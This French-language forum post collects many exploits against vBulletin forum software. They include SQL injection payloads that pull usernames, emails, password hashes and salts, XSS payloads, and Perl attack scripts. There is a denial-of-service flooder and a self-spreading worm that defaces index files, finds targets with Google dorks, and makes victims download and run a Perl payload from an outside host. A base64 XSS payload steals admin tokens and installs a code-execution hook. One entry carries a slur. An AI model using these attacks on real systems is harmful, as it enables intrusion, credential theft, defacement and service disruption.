Annonce

Réduire
Aucune annonce.

La plus grande collection D'exploit Vbulletin Du net ,

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • La plus grande collection D'exploit Vbulletin Du net ,

    Bref , tout est dans le titre ..

    vBuletin 4.0.x => 4.1.2 SQLi Vuln
    Code:
    ====================================================================
    #vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
    ====================================================================
    #                                                                  #
    #         888     d8          888   _   888          ,d   d8       #
    #    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
    #   d888  888   d888   888    888d8b    888  888b   888  888       #
    #   8888  888  / 888   888    888Y88b   888  8888   888  888       #
    #   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
    #    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
    #                                                                  #
    ====================================================================
    #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
    ====================================================================
     
    #[+] Discovered By   : D4rkB1t
    #[+] Site            : NaN
    #[+] support e-mail  : [email protected]
     
     
    Product: http://www.vbulletin.com
    Version: 4.0.x
    Dork : inurl:"search.php?search_type=1"
     
    --------------------------
    #   ~Vulnerable Codes~   #
    --------------------------
    /vb/search/searchtools.php - line 715;
    /packages/vbforum/search/type/socialgroup.php - line 201:203;
     
    --------------------------
    #        ~Exploit~       #
    --------------------------
    POST data on "Search Multiple Content Types" => "groups"
     
    &cat[0]=1) UNION SELECT database()#
    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
     
    More info: http://j0hnx3r.org/?p=818
    vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod)

    Code:
    vBulletin 3.7.0 <= XSS Explot
    
        * Requires ajaxReg mod (a common mod)
    
    
    Found by RoBOTNIK
    [email protected]
    l3vel-69.net
    
    What is ajaxReg mod?
    ajaxReg is a common mod used for checking registration details while you are typing them.
    
    ajaxReg:
    http://www.vbulletin.org/forum/showthread.php?t=144869
    
    POC:
    http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
    http://www.site.com/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>
    vBulletin Secure Downloads Mod

    Code:
    ===[FOUND BY BaKo]===
    
    ########################################
    
    Script: vBulletin Secure Downloads Mod
    
    ########################################
    
    Type: SQL Injection
    
    ########################################
    
    Usage:
    
    http://site.com/fileinfo.php?id=-1674'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/*
    
    (the number of columns vary per site. use order by to find the correct number if this doesnt work.)
    
    #######################################
    
    dork: "Powered by Secure Downloads"
    
    #######################################
    
    Discovered by: BaKo -[ciphercrew and h4ck-y0u]-
    
    #######################################
    
    Status: Unpatched
    
    #######################################
    
    Greetz to:
    xprog, Novalok, dr wh4x, tulle, inspiratio, illuz1on, cam-man-dan, optiplex, Untamed, GM, t0pP8uZz, Thedefaced, h4ck-y0u, and everyone else I forgot
    
    ########################################
    
    ~censored~:
    all of balcan-crew, those exploit leaking faggots.
    
    ########################################
    vBulletin 3.x.x 'finalupgrade.php' Exploit

    Code:
    #/usr/bin/perl
    #codEd by dEmOn | mE
    # --
    #   --->    http://devsn.org    <------
    
    ##       ---=== vBulletin 3.x.x 'finalupgrade.php' Exploit ===---        ##
    
    ######################################
    ##    NOTE: This vulnerability is not discovered by me...     ##
    ##     So, I take no credit for the vuln,,,             ##
    ##   I only Coded the exploit... ..   Anyway, idk who        ##
    ##    discovered this vuln,, So, GJ! :)             ##
    ######################################
    
    #   --->    http://devsn.org    <------
    
    use LWP::UserAgent;
    
    $ua = LWP::UserAgent->new;
    $ua->agent("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)");
    
    print "\n ---=== vBulletin 3.x 'finalupgrade.php' Exploit ===---\n\n";
    
    print "\n===============[x]==================\n";
    print "        ._.       ___________._.\n";        
    print "        | | _____ \\_   _____/| |\n";        
    print " ______ | |/     \\ |    __)_ | |  ______\n";
    print "/_____/  \\|  Y Y  \\|        \\ \\| /_____/ \n";
    print "         _|__|_|  /_______  / __ \n";      
    print "         \\/     \\/        \\/  \\/\n";
    print "\n===============[x]==================\n";
    
    print "\n Enter the forum URL(e.g. http://www.site.com/vb/ ): ";
    $url = <STDIN>;
    print "\n\nChecking for vuln..\n";
    
    chomp($url);
    
    my $response = $ua->get($url . 'install/finalupgrade.php?step=http://www.devsn.org');
    if ($response->is_success) {
    if ($response->content =~ m/vBulletin Database Backup System/gi){
    print "\nExploit Success!\n";
    print "\n Go TO: " . $url . "install/finalupgrade.php?step=http://www.devsn.org\n";
    }
    else {
    print "\nNot vuln.. Exploit Failed!\n";
    }
    }
    else {
    print "\nExploit Failed:";
    print "\n" . $response->status_line;
    }
    
    print "\n---=== EOF ===---\n";
    print "\nhttp://devsn.org\n";
    $end = <STDIN>;
    vBulletin Worm <= 3.0.6

    Code:
    #!/usr/bin/perl
    
    #####################
    ####
    #### #### #### #### #### #### #### # # # # ####
    #### # # # # # # # # # # # # # #
    #### #### # # ### ## #### # #### ## ###
    #### # # # # # # # # # # # # #
    #### # #### #### # # #### #### # # # # ####
    ####
    #####################
    
    use IO::Socket::INET;
    $hahaha = $0;
    my $processo = "/usr/local/sbin/httpd";
    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";
    
    $0="$processo"."\0"x16;
    my $pid=fork;
    exit if $pid;
    
    ########################
    # #
    # procura index #
    # #
    #######################
    
    system("locate index.* >> index");
    system("find / -name index.* >> index");
    
    open(a,"<index");
    @ind = <a>;
    close(a);
    $b = scalar(@ind);
    for($a=0;$a<=$b;$a++){
    chomp $ind[$a];
    system("echo spykids ownz your server > $ind[$a]");
    }
    
    
    #########################
    # #
    # pega sites e registra #
    # #
    #########################
    
    `cat /etc/httpd/conf/httpd.conf |grep ServerName >> sites`;
    
    
    open(a,"<sites");
    @site = <a>;
    close(a);
    
    $b = scalar(@site);
    
    for($a=0;$a<=$b;$a++)
    {
    $site[$a] =~ s/#//g;
    $site[$a] =~ s/servername//g;
    $site[$a] =~ s/ServerName//g;
    $site[$a] =~ s/ //g;
    $testa = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next;
    print $testa "GET / HTTP/1.0\n\n";
    print $testa "Host: $site";
    print $testa "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print $testa "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print $testa "Accept-Language: pt-br, pt;q=0.50";
    print $testa "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print $testa "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print $testa "Keep-Alive: 300";
    print $testa "Connection: keep-alive";
    @ow = <$testa>;
    close($teste);
    $ae = "@ow";
    if($ae =~/spykids/i){
    $sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou";
    print $sock "POST /en/defacements/notify HTTP/1.0\r\n";
    print $sock "Accept: */*\r\n";
    print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";
    print $sock "Accept-Language: pt-br\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    print $sock "Host: www.zone-h.org\r\n";
    print $sock "Content-Length: 385\r\n";
    print $sock "Pragma: no-cache\r\n";
    print $sock "\r\n";
    print $sock "notify_defacer=SpyKids&notify_domain=http%3A%2F%2F$site[$a]&notify_hackmode=18&notify_reason=5&notify=+OK+\r\n";
    
    close($sock);
    }
    }
    
    
    #########################
    # #
    # worm aws.spykids #
    # #
    ########################
    while(1){
    $cmd = '/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://compras.el-nacional.com/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids*;%20wget%20http://compras.el-nacional.com/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids*%22)}}';
    
    
    
    
    @site = "";
    $a=0;
    @dom = (".ar",".au",".aw",".ax",".az",".ba",".bb",".bd",".be",".bf",".bg",".bh",".bi",".bj",".bm",".bn",".bo",".br",".bs",".bt",".bv",".bw",".by",".bz",".ca",".cc",".cd",".cf",".cg",".ch",".ci",".ck" , ".cl", ".cm",".cn",".co",".cr",".cs",".cu", ".cv",".cx",".cy",".cz",".de",".dj",".dk",".dm",".do",".dz", ".ec",".ee",".eg",".eh",".er",".es",".et",".fi",".fj",".fk",".fm", ".fo",".fr",".ga",".gb",".gd",".ge",".gf",".gg",".gh",".gi",".gl", ".gm",".gn",".gp",".gq",".gr",".gs",".gt",".gu",".gw",".gy",".hk", ".hm",".hn",".hr",".ht",".hu",".id",".ie",".il",".im",".in",".io",".iq", ".ir",".is",".it",".je",".jm",".jo",".jp",".ke",".kg",".kh",".ki",".km", ".kn",".kp",".kr",".kw",".ky",".kz",".la",".lb",".lc",".li",".lk",".lr",".ls", ".lt",".lu",".lv",".ly",".ma",".mc",".md",".mg",".mh",".mk",".ml",".mm", ".mn",".mo",".mp",".mq",".mr",".ms",".mt",".mu",".mv",".mw",".mx",".my", ".mz",".na",".nc",".ne",".nf",".ng",".ni",".nl",".no",".np",".nr",".nu",".nz",".om", ".pa",".pe",".pf",".pg",".ph",".pk",".pl",".pm",".pn",".pr",".ps",".pt",".pw",".py", ".qa",".re",".ro",".ru",".rw",".sa",".sb",".sc",".sd",".se",".sg",".sh",".si",".sj",".sk",".sl", ".sm",".sn",".so",".sr",".st",".sv",".sy",".sz",".tc",".td",".tf",".tg",".th",".tj",".tk",".tl",".tm", ".tn",".to",".tp",".tr",".tt",".tv",".tw",".tz",".ua",".ug",".uk",".um",".us",".uy",".uz",".va",".vc",".ve",".vg",".vi",".vn", ".vu",".wf",".ws",".ye",".yt",".yu",".za",".zm",".zw");
    foreach $dom (@dom){
    $site = "www.google.com";
    open(a,">pra.txt");
    print a "";
    close(a);
    ############### google
    
    for($n=0;$n<1000;$n += 100){
    $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
    print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n";
    print $sock "Host: www.google.com";
    print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print $sock "Accept-Language: pt-br, pt;q=0.50";
    print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print $sock "Keep-Alive: 300";
    print $sock "Connection: keep-alive";
    @resu = <$sock>;
    close($sock);
    $ae = "@resu";
    while ($ae=~ m/<a href=.*?>.*?<\/a>/){
    $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
    $uber=$1;
    if ($uber !~/translate/)
    {
    if ($uber !~ /cache/)
    {
    if ($uber !~ /"/)
    {
    if ($uber !~ /google/)
    {
    if ($uber !~ /216/)
    {
    if ($uber =~/http/)
    {
    
    substr($uber,0,7) = "";
    $nu = rindex $uber, '/';
    $uber = substr($uber,0,$nu);
    
    
    open(a,">>pra.txt");
    print a "$uber\n";
    close(a);
    
    }}}}}}
    }
    }
    $ark = "pra.txt";
    @si = "";
    open (arquivo,"<$ark");
    @si = <arquivo>;
    close(arquivo);
    $novo ="";
    foreach (@si){
    if (!$si{$_})
    {
    $novo .= $_;
    $si{$_} = 1;
    }
    }
    open (arquivo,">$ark");
    print arquivo $novo;
    close(arquivo);
    open(a,"<pra.txt");
    @site = <a>;
    close(a);
    
    foreach $site (@site){
    chomp $site;
    
    ($site, $dir) = split('/',$site);
    
    
    $soc = IO::Socket::INET->new(PeerAddr => $site, PeerPort => 80, Proto => "tcp") or next;
    print $soc "GET /$dir$cmd HTTP/1.0\n\n";
    print $soc "Host: $site";
    print $soc "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print $soc "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print $soc "Accept-Language: pt-br, pt;q=0.50";
    print $soc "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print $soc "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print $soc "Keep-Alive: 300";
    print $soc "Connection: keep-alive";
    close($soc);
    
    }
    }
    }
    [Perl]vBulletin Version 4.0.1 Remote SQL Injection Exploit

    Code:
    #!/usr/bin/perl 
     
    use IO::Socket; 
     
     
    print q{ 
    #######################################################################
    #    vBulletin? Version 4.0.1 Remote SQL Injection Exploit            #
    #                      By indoushka                                   #
    #                     www.iq-ty.com/vb                                #
    #               Souk Naamane  (00213771818860)                        #
    #           Algeria Hackerz ([email protected])                   # 
    #          Dork: Powered by vBulletin? Version 4.0.1                  #            
    ####################################################################### 
    }; 
     
    if (!$ARGV[2]) { 
     
    print q{ 
        Usage: perl  VB4.0.1.pl host /directory/ victim_userid 
     
           perl  VB4.0.1.pl www.vb.com /forum/ 1 
     
     
    }; 
     
    } 
     
     
    $server = $ARGV[0]; 
    $dir    = $ARGV[1]; 
    $user   = $ARGV[2]; 
    $myuser = $ARGV[3]; 
    $mypass = $ARGV[4]; 
    $myid   = $ARGV[5]; 
     
    print "------------------------------------------------------------------------------------------------\r\n"; 
    print "[>] SERVER: $server\r\n"; 
    print "[>]    DIR: $dir\r\n"; 
    print "[>] USERID: $user\r\n"; 
    print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
     
    $server =~ s/(http:\/\/)//eg; 
     
    $path  = $dir; 
    $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
     
     
    print "[~] PREPARE TO CONNECT...\r\n"; 
     
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
     
    print "[+] CONNECTED\r\n"; 
    print "[~] SENDING QUERY...\r\n"; 
    print $socket "GET $path HTTP/1.1\r\n"; 
    print $socket "Host: $server\r\n"; 
    print $socket "Accept: */*\r\n"; 
    print $socket "Connection: close\r\n\r\n"; 
    print "[+] DONE!\r\n\r\n"; 
     
     
     
    print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
    while ($answer = <$socket>) 
    { 
     
     if ($answer =~/(\w{32})/) 
    { 
     
      if ($1 ne 0) { 
       print "Password is: ".$1."\r\n"; 
    print "--------------------------------------------------------------------------------------\r\n"; 
     
          } 
    exit(); 
    } 
     
    } 
    print "------------------------------------------------------------------------------------------------\r\n";
    vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability

    Code:
    Attackers can use a browser to exploit this issue.
    
    The following example input is available:
    
    user name = ' ORDER BY 15/*
    user name = ' ORDER BY 16/*
    user name = ' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*
    vBulletin 3.8.2 Denial of Service Exploit

    Code:
    #!usr/bin/perl
    #vBulletin® Version 3.8.2 D3n14l 0f S3rv1c3 Expl01t
    #HaCker Anger - Qkk (at) Hotmail (dot) Fr [email concealed]
    ########################################################################
    
    # Modules #
    ########################################################################
    
    use IO::SOCKET; # Object interface #
    ########################################################################
    
    if (@ARGV<1){
    print"
    ########################################################################
    
    ## Author : Hacker Anger ##
    ## TeaM : The Assassin Scorpion TeaM ##
    ## Home : http://Baloma.NeT ##
    ## Mail : Qkk (at) Hotmail (dot) Fr [email concealed] ##
    ## ##
    ########################################################################
    
    ########################################################################
    
    ## ## ##
    ##->vBulletin 3.8.2 Denial of Service Exploit<- ##
    ##
    ## ## ##
    ##Enter These Exploit ## ##
    ##1.Target ##[*] www.Baloma.net ##
    ##2.Forum ##[*] vbulletin ##
    ##3.Exploit ##[*] forumdisplay.php?f= ##
    ##4.Execution length/timeout ##[*] 7777777777777777 ##
    ##5.Port ##[*] 80 ##
    ########################################################################
    
    \a";}
    $anger_Block = "
    ########################################################################
    ";
    $Hacker = "Error!Error!Error!Error";
    $H-a =0;
    print"$anger_Block\n";
    print q(Target->);
    chomp($H-zi3l =<STDIN>);
    if ($H-zi3l eq""){
    die "$Hacker\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print q(Path->);
    chomp($H4ck3r_4n93r =<STDIN>);
    if ($H4ck3r_4n93r eq "") {
    die "$Hacker !\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print "Vulnerability\n";
    print"forumdisplay.php?f=\n";
    print"->\n";
    chomp($Exploit =<STDIN>);
    if ($Exploit eq "") {
    die "$Hacker !\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print q(Time->);
    chomp($H-flood =<STDIN>);
    if ($H-flood eq "") {
    die "$Hacker !\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print q(Port->);
    chomp($p0rt =<STDIN>);
    if ($p0rt eq ""){
    die "$Hacker \n";}
    print"$anger_Block\n";
    print q(Send "start"->);
    chomp($H-start =<STDIN>);
    if ($H-start eq "") {
    die "$Hacker\n";}
    print "$anger_Block\a\n";
    print "[+]Check Data \n";
    print "[*]Check Target : $H-zi3l\n";
    print "[*]Check Forum : $H4ck3r_4n93r\n";
    print "[*]Checking Port : $p0rt\n";
    print "$anger_Block\n";
    if($H-start == 1){
    while($H-a != 0000){
    $H-a++;}
    }elsif ($H-start == start){
    while($H-a != $H-flood)
    {
    $4n93r_postit = "$H-zi3l"."$H4ck3r_4n93r"."$Exploit";
    $4n93r_l = length $4n93r_postit;
    $4n93r = new IO::Socket::INET (
    PeerAddr => "$H-zi3l",
    PeerPort => "$p0rt",
    Proto => "tcp",
    );
    
    print $4n93r "POST $H4ck3r_4n93r$Exploit HTTP/1.1\n";
    print $4n93r "Host: $H-zi3l\n";
    print $4n93r "Accept:
    text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
    n;q=0.8,image/png,*/*;q=0.5\n";
    print $4n93r "Referer: $H-zi3l\n";
    print $4n93r "Accept-Language: en-us\n";
    print $4n93r "Content-Type: application/x-www-form-urlencoded\n";
    print $4n93r "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
    rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
    print $4n93r "Content-Length: $4n93r_l\n\n";
    print $4n93r "$4n93r_postit\n";
    close($4n93r);
    syswrite STDOUT, "->BLACKOUT<-";
    $H-a++;
    }
    }else{
    die "Error - can't connect to target $H-zi3l !\n";
    }
    vBulletin multiple XSS

    Code:
    vBulletin 3.8.2 adminCP Cross-Site Scripting
    R.I.P DrtRp - We miss you
    ---------------------------------------------
    Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
    Greetz to Aura & all Aria-Security Mods & Members
    
    These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.
    
    1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    or any other XSS code.
    
    2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    
    3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    
    4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    Secure Downloads for vBulletin 'fileinfo.php' SQL Injection Vulnerability

    Code:
    http://www.example.com/fileinfo.php?id=1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0
    Multiple Sql Injection in vBulletin 3.7.4

    Code:
    1. Sql Injection in "admincp/verify.php"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~
    
    Impact: low
    Preconditions: attacker must have admin account with Human Verification Manager
    administer privileges
    
    [---------- source code snippet start ----------]
    if ($_POST['do'] == 'updateanswer')
    {
    $vbulletin->input->clean_array_gpc('p', array(
    'answer' => TYPE_STR,
    ));
    ..
    $db->query_write("
    UPDATE " . TABLE_PREFIX . "hvanswer
    SET answer = '" . $vbulletin->GPC['answer'] . "'
    WHERE answerid = " . $vbulletin->GPC['answerid']
    );
    [----------- source code snippet end -----------]
    
    It appears, that user submitted parameter "answer" is not properly sanitized
    before using in sql query. As result sql injection is possible. Test will 
    induce sql error message:
    
    Invalid SQL:
    UPDATE vb_hvanswer
    SET answer = 'war'axe'
    WHERE answerid = 1;
    
    2. Sql Injection in "admincp/attachmentpermission.php"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~
    
    Impact: low
    Preconditions: attacker must have admin account with Attachment Permissions
    Manager administer privileges
    
    As in previous case, user submitted parameter, this time it's "extension", is
    used in sql query without proper snaitization. This results sql injection 
    vulnerability. For test log in as admin with needed privileges and then issue
    GET request (using proper URI instead if example):
    
    http://localhost/vbulletin374/admincp/attachmentpermission.php?do=edit&e
    xtension=war'axe
    
    This results with error message from vBulletin:
    
    Database error in vBulletin 3.7.4:
    Invalid SQL:
    
    SELECT size, width, height
    FROM attachmenttype
    WHERE extension = 'war'axe';
    
    3. Sql Injection in "admincp/image.php"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~
    
    Impact: low
    Preconditions: attacker must have admin account with Avatars administer privileges
    
    [---------- source code snippet start ----------]
    if ($_POST['do'] == 'updatepermissions')
    {
    $vbulletin->input->clean_array_gpc('p', array(
    'iperm' => TYPE_ARRAY,
    'imagecategoryid' => TYPE_INT
    ));
    ..
    foreach($vbulletin->GPC['iperm'] AS $usergroupid => $canuse)
    {
    if ($canuse == 0)
    {
    $db->query_write("
    INSERT INTO " . TABLE_PREFIX . "imagecategorypermission
    (
    imagecategoryid,
    usergroupid
    )
    VALUES
    (
    " . $vbulletin->GPC['imagecategoryid'] . ",
    $usergroupid
    )
    [----------- source code snippet end -----------]
    
    User-submitted array "iperm" is used in sql query without proper sanitization.
    This results in sql injection. Testing ends with error message:
    
    MySQL Error : Unknown column 'waraxe' in 'field list'
    XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

    Code:
    The XSS in question exists on the log viewing page of the admin control panel.
    
    When a missing page is requested, a log is created in the admin area, however
    the inputs to this log lack sanitation. The script name is taken from
    basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one
    can be used for introducing XSS vectors.
    
    To highlight the severity and underline the fact that his vulnerability is
    exploitable:
    
    <html>
    <body>
    <img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri
    '/*"
    />
    <img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<scrip
    t
    '/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'
    /*"
    />
    <!--edit to match your data -->
    <img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/
    *"
    />
    <img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip
    '/*"
    />
    <!-- end edit -->
    <img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd
    %2Be%2Bf%2Bg/*"
    />
    <img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
    </body>
    </html>
    
    You then need to send the admin to
    adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1
    and the XSS will render.
    
    The limits on the XSS:
    basename(PHP_SELF) is 50 characters max and no slashes
    _REQUEST['do'] is limited to 20 characters, but no character restriction.
    
    The tight character limits on the unsanitized parameters are not
    mitigating the severity, as unlimited
    attack space can be obtained as shown above.
    
    As per my last exploits, all XSS in the vBulletin ACP can be used for
    PHP injection instantly. This
    is due to the design of the vBulletin hooks feature. As this
    particular XSS is persistent and will
    render in all major browsers it is particularly dangerous.
    vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index

    Code:
    The XSS in question exists on the login page for the MCP (moderation
    control panel).
    The login script takes a redirect parameter that lacks sanitation, allowing a
    rather easy XSS:
    
    http://localhost/vB3/modcp/index.php?redirect={XSS}
    
    What is even better is that the exploit will work outright if the
    admin/moderator is already logged in;
    if the admin/moderator is not, they will be required to log in.
    However, if an admin
    logs into the MCP, he is also logged into the ACP, allowing the same
    exploit as last time
    (remote PHP code injection via the hooks system).
    
    If you Base64-encode your attack vector using
    the data: URI scheme, the XSS survives the login request and activates after
    the admin/moderator is logged in. A simple example of the above:
    
    http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNj
    cmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
    
    In this case (as per the last case as well), you have an unlimited and
    unaltered XSS space,
    so you're free to invoke some AJAX and have fun.
    Just to give ideas on how this could turn into something larger,
    vBulletin has hooks that operate using eval(), and new hooks can
    be added via the ACP itself. It is trivial to write some JS that not only
    enables hooks but also inserts a nice RFI hook. Here's one using the data
    URI:
    
    data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94L3dy1mb3
    JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz
    0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3
    N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW
    5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdX
    Bsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW
    5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKH
    IuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va2
    5hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZX
    I9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cF
    JlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZX
    IoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD
    0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2
    RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSH
    R0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZG
    VyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Ii
    k8L3NjcmlwdD4K
    
    The above will survive a login prompt. It will then, once executed, proceed
    to parse one of the ACP pages and extract the admin hash and token, then
    it will enable hooks and add one that executes phpinfo().
    
    Obviously the above requires an admin in this context. Similar techniques
    could be used to exploit the modcp as usual, banning users, enabling the
    pruning of threads etc.
    
    If you want to cause annoyance, you can esally exploit just a
    moderator (and thus have more
    success in the exploit being run). This example enables pruning for
    all forums on all posts:
    
